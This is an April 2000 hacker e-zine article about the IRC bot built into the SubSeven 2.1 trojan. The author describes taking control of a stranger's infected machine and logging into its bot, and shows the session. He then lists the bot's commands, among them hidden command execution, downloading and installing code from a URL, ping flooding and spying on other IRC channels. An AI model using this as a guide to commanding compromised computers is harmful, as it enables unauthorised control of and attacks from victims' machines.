   _________ SWAT MAGAZINE ISSUE TWENTY EIGHT APRIL 2000 __________
  /         \___________________________________________/          \
 /	               SubSeven 2.1 Bots                            \
/                       by _Smurf_                                   \
-----------------------------------------------------------------------


While i was bored one day i found someone wih the SubSeven 2.1 trojan
on there box so i decided to learn a little more about the SubSeven bot
features.
set up the settings so it joins the correct server and channel.
to identify yourself to the BOT once it joins the channel you set click
 on its nickname and then type @login server.password that is if you
set the command prefix to @ (its the default)


Session Start: Thu Mar 23 00:32:01 2000
 @login hahahaha.top.security.password.by.._Smurf_..
  password accepted

  sub7bot channel commands

  -CHANNEL ONLY COMMANDS-
  @update <URL> the server will automatically download the server
          and install it over the current one.
  @run <command> [run the specified command invisibly]

  -CHANNEL COMMANDS-
  @newpass <new password>
  @ident <new ident>
  @op <nickname>
  @say <text>
  @deop <nickname>
  @cycle
  @part <reason>
  @mode <channel modes>
  @join <channel> <key>
  @kick <nick>
  @ban <nickname>
  @unban <nickname>
  @quit <reason>
  @ping <ip> <packet size> [will ping the specified IP and return the result]
  @mping <ip> <packet size> <n> [will ping the specified IP with the specified packet size n times]
  @info [will report the server settings - just like irc notify]
  end of channel commands


  sub7bot private commands

  -PRIVATE COMMANDS-
  @ident <new ident>
  @newpass <new password>
  @update <URL>
  @run <command>
  @join <channel> <key>
  @cycle <channel> [if not spcified, it'll cycle the current channel]
  @op <channel> <nickname>
  @deop <channel> <nickname>
  @quit <quit message>
  @nick <new nickname>
  @raw <raw command>
  @prefix <new prefix>
  @ban <channel> <nickname>
  @unban <channel> <nickname>
  @say <channel/nickname> <text>
  @ping <ip> <packet size> [will ping the specified IP and return the result]
  @mping <ip> <packet size> <n> [will ping the specified IP with the specified packet size n times]
  @info [will report the server settings - just like irc notify]
  @kick <channel> <nick>
  @reroute <channel/nickname> <channel/nickname> [will relay everything said on/by first parameter to the secound parameter]
  @rroff [disable rerouting - also, if you send the command "reroute" again, it will override the previous parameters]

  -- the following is alist of commands to controll the server on another server --
  @spy_login <server> <port> [this is the FIRST command you have to send]
  @spy_nick <nickname> [it picks a random nick when it jooins the server, use this to change it]
  @spy_join <channel> <key>
  @spy_part <reason>
  @spy_quit [exits the server, don't specify a reason]
  @spy_start <channel/nickname> <channel/nickname> [this will start rerouting. first parameter is on the spied irc server, secound is on the local server]
  @spy_start <channel/nickname> <channel/nickname> [this will start rerouting BOTH WAYS. first parameter is on the spied irc server, secound is on the local server]
  @spy_stop [take a WILD guess]

if you use the raw command thn you can get the bot to do mainly everything so its kewl.
anyway thats it and i was bored so decided to put this info here 4 ya.
but don't call yourself a hacker if u mess with trojans.

_Smurf_
ICQ: 19084839